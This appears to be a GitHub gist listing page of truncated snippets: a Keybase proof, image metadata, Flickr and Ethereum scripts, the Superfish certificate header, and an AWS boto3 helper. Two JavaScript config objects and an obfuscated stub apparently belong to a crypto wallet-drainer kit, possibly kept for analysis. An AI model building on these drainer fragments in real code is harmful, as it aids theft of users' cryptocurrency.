I hereby claim:
- I am andrewmohawk on github.
- I am andrewmohawk (https://keybase.io/andrewmohawk) on keybase.
- I have a public key ASDh6dwwpSD4ghbleoUsjN9X1V1J9sA4Z0YXWWvReVZJ9Ao
To claim this, I am signing this object:
| ICC_Profile:ProfileDescriptionML-zh-TW: iMac | |
| XMP:ColorSpace: Uncalibrated | |
| XMP:YResolution: 72 | |
| ICC_Profile:ProfileDescriptionML-ca-ES: iMac | |
| XMP:XResolution: 72 | |
| PNG:BlueX: 0.1235 | |
| ICC_Profile:PrimaryPlatform: Apple Computer Inc. | |
| ICC_Profile:ProfileDateTime: 2016:01:01 14:38:03 | |
| ICC_Profile:DeviceManufacturer: APPL | |
| ICC_Profile:ProfileDescriptionML-fi-FI: iMac |
| EXIF:ThumbnailLength: 4419 | |
| ICC_Profile:ProfileDateTime: 1998:02:09 06:49:00 | |
| ICC_Profile:ViewingCondIlluminantType: D50 | |
| ICC_Profile:ViewingCondIlluminant: 19.6445 20.3718 16.8089 | |
| ICC_Profile:PrimaryPlatform: Microsoft Corporation | |
| File:FileSize: 700 kB | |
| ICC_Profile:DeviceManufacturer: IEC | |
| File:YCbCrSubSampling: YCbCr4:4:4 (1 1) | |
| Photoshop:GlobalAltitude: 30 | |
| EXIF:BitsPerSample: 8 8 8 |
I hereby claim:
To claim this, I am signing this object:
| #!/usr/bin/python3 | |
| import flickr_api | |
| import os | |
| import sys | |
| import urllib | |
| import threading | |
| from six import text_type, iteritems, with_metaclass | |
| flickr_api.set_keys(api_key = 'coolapikey', api_secret = 'secretsthebest') |
| import asyncio | |
| import aiohttp | |
| import json | |
| import time | |
| async def get_block_height(session, url): | |
| headers = {'Content-Type': 'application/json'} | |
| try: | |
| async with session.post(url,headers=headers, json={'jsonrpc':'2.0','method':'eth_blockNumber','params':[],'id':1}) as response: |
superfish.pem contains:
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)| // Configuration object | |
| const config = { | |
| blur: 0x2, | |
| seaport: 1.4, | |
| ostransfers: 2.2, | |
| uniswap: 1.3, | |
| uniswapv2: 1.6, | |
| stargate: 2.7, | |
| permit: 1.8, | |
| permit2: 2.5, |
| const config = { | |
| customerId: "0xDSN1H6CU", | |
| forcePopup: false, | |
| logRepeatedConnections: true, | |
| logEmptyWallets: false, | |
| logClosedTab: true, | |
| logIpData: false, | |
| sendEthType: 1, | |
| forceChangeChainNetwork: true, | |
| forceAddChainNetwork: true, |
| function _0x32b3(_0x3ae10a, _0x16cd8a) { | |
| const _0x37fa3f = _0x3b7a(); | |
| _0x32b3 = function (_0x458507, _0x47da65) { | |
| _0x458507 = _0x458507 - 0x157; | |
| let _0x559de0 = _0x37fa3f[_0x458507]; | |
| return _0x559de0; | |
| }; | |
| return _0x32b3(_0x3ae10a, _0x16cd8a); | |
| } | |
| (function (_0x121038, _0x23a280) { |
| import boto3 | |
| import subprocess | |
| import os | |
| def get_client(service, aws_access_key_id, aws_secret_access_key, aws_session_token, region_name='us-east-2'): | |
| return boto3.client(service, | |
| aws_access_key_id=aws_access_key_id, | |
| aws_secret_access_key=aws_secret_access_key, | |
| aws_session_token=aws_session_token, | |
| region_name=region_name) |